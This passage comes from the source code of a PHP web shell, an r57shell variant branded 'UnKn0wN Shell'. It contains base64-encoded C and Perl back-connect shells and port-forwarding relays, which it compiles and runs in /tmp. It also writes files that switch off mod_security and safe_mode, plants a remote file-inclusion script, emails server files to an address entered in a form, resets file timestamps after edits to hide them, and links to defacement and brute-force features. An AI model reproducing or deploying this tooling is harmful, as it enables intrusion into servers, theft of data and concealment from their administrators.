BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
lsZSk7DQogIHJldHVybiAwOw0KfQ==";
$shellvic="QWx1Q2FS==";
$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
$php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
$sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";

if($unix)
 {
 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
 if($safe_mode) { $sysctl = '-'; }
 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
 else
  {
   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
   if(empty($sysctl)) { $sysctl = '-'; }
   setcookie('sysctl',$sysctl);
  }
 }
echo $head;
echo '</head>';
if(empty($_POST['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_SERVER['SERVER_ADDR']);
$current_version = str_replace('.','',$version);
}
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main bgcolor=Black width=160><font face=Verdana size=1>'.ws(3).' <b><font color=Red>o--{ <font color=White>UnKn0wN Shell</font> }--o</font></b></font></td><td class=main bgcolor=Black><font face=Verdana size=-2>';
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
if($unix)
 {
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
 }
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?deface title=\"".$lang[$language.'_text49']."\"><b>deface</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ln title=\"".$lang[$language.'_text49']."\"><b>ln -s all</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?brute title=\"".$lang[$language.'_text49']."\"><b>brute</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text49']."\"><b>users</b></a> ".$rb."<br>";
echo ws(2)."safe_mode: <b>";
echo (($safe_mode)?("<font color=#DF0000>ON</font>"):("<font color=#DF0000>OFF</font>"));
echo "</b>".ws(2);
echo "PHP version: <b>".@phpversion()."</b>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: <b>".(($curl_on)?("<font color=#DF0000>ON</font>"):("<font color=#DF0000>OFF</font>"));
echo "</b>".ws(2);
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=#DF0000>ON</font>"; } else { echo "<font color=#DF0000>OFF</font>"; }
echo "</b>".ws(2);
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#DF0000>OFF</font>";}
echo "</b>".ws(2);
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#DF0000>OFF</font>";}
echo "</b>".ws(2);
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#DF0000>OFF</font>";}
echo "</b><br>".ws(2);
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=#DF0000>NONE</font></b>";}else{echo "<font color=#DF0000>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
echo '</font></td></tr><table>

<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333>
<tr><td class=main align=right width=100>';
echo $font;
if($unix){
echo '<font color=White><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo '</td><td  class=main>';
echo "<font face=Verdana size=-2 color=#DF0000><b>";
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
echo ws(3).$sysctl."<br>";
echo ws(3).ex('echo $OSTYPE')."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
if(!empty($id)) { echo ws(3).$id."<br>"; }
else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
 {
 $euserinfo  = @posix_getpwuid(@posix_geteuid());
 $egroupinfo = @posix_getgrgid(@posix_getegid());
 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
 }
else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "</b></font>";
}
else
{
echo '<font color=White><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo '</td><td class=main>';
echo "<font face=Verdana size=-2 color=#DF0000><b>";
echo ws(3).@substr(@php_uname(),0,120)."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
echo ws(3).@getenv("USERNAME")."<br>";

echo ws(3).$dir;
echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";
$f = '<br>';
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
 {
 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
 err(6+$res);
 $_POST['cmd']="";
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
 {
 if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
 else
  {
    $filename = @basename($_POST['loc_file']);
    $filedump = @fread($file,@filesize($_POST['loc_file']));
    fclose($file);
    $content_encoding=$mime_type='';
    compress($filename,$filedump,$_POST['compress']);
    $attach = array(
                    "name"=>$filename,
                    "type"=>$mime_type,
                    "content"=>$filedump
                   );
    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
    if(empty($_POST['from'])) { $_POST['from'] = '[email protected]'; }
    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
    err(6+$res);
    $_POST['cmd']="";
  }
 }
if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
{
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
 {
 switch($_POST['what'])
   {
   case 'own':
   @chown($_POST['param1'],$_POST['param2']);
   break;
   case 'grp':
   @chgrp($_POST['param1'],$_POST['param2']);
   break;
   case 'mod':
   @chmod($_POST['param1'],intval($_POST['param2'], 8));
   break;
   }
 $_POST['cmd']="";
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
 {
   switch($_POST['what'])
   {
     case 'file':
      if($_POST['action'] == "create")
       {
       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
       else {
        fclose($file);
        $_POST['e_name'] = $_POST['mk_name'];
        $_POST['cmd']="edit_file";
        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
        }
       }
       else if($_POST['action'] == "delete")
       {
       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
       $_POST['cmd']="";
       }
     break;
     case 'dir':
      if($_POST['action'] == "create"){
      if(mkdir($_POST['mk_name']))
       {
         $_POST['cmd']="";
         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
       }
      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
      }
      else if($_POST['action'] == "delete"){
      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
      $_POST['cmd']="";
      }
     break;
   }
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
 {
 if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
 if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
 else {
 echo $table_up3;
 echo $font;
 echo "<form name=save_file method=post>";
 echo ws(3)."<b>".$_POST['e_name']."</b>";
 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
 echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
 fclose($file);
 echo "</textarea>";
 echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
 echo "<input type=hidden name=dir value=".$dir.">";
 echo "<input type=hidden name=cmd value=save_file>";
 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
 echo "</div>";
 echo "</font>";
 echo "</form>";
 echo "</td></tr></table>";
 exit();
 }
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
 {
 $mtime = @filemtime($_POST['e_name']);
 if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
 else {
 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
 @fwrite($file,$_POST['e_text']);
 @touch($_POST['e_name'],$mtime,$mtime);
 $_POST['cmd']="";
 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
 }
 }

if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
{
 cf("/tmp/bd.c",$port_bind_bd_c);
 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
 @unlink("/tmp/bd.c");
 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
 $_POST['cmd']="ps -aux | grep bd";
}
if (!empty($_POST['php_ini1']))
{
 cf("php.ini",$php_ini1);
  $_POST['cmd']=" Da write xong php.ini thu? thu? coi di";
 }

 if (!empty($_POST['htacces']))
{
 cf(".htaccess",$htacces);
  $_POST['cmd']="Da write xong htaccess thu? thu? coi di ";
 }
  if (!empty($_POST['file_ini']))
{
 cf("ini.php",$sni_res);

  $_POST['cmd']=" http://target.com/ini.php?ss=http://shell.txt? Da write xong ini.php thu xem ^^!";
 }
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
{
 cf("/tmp/bdpl",$port_bind_bd_pl);
 $p2=which("perl");
 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
 $_POST['cmd']="ps -aux | grep bdpl";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
{
 cf("/tmp/back",$back_connect);
 $p2=which("perl");
 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
{
 cf("/tmp/back.c",$back_connect_c);
 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
 @unlink("/tmp/back.c");
 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
{
 cf("/tmp/dp",$datapipe_pl);
 $p2=which("perl");
 $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
 $_POST['cmd']="ps -aux | grep dp";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
{
 cf("/tmp/dpc.c",$datapipe_c);
 $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
 @unlink("/tmp/dpc.c");
 $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
 $_POST['cmd']="ps -aux | grep dpc";
}
if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
if (!empty($HTTP_POST_FILES['userfile']['name']))
{
if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
@copy($HTTP_POST_FILES['userfile']['tmp_name'],
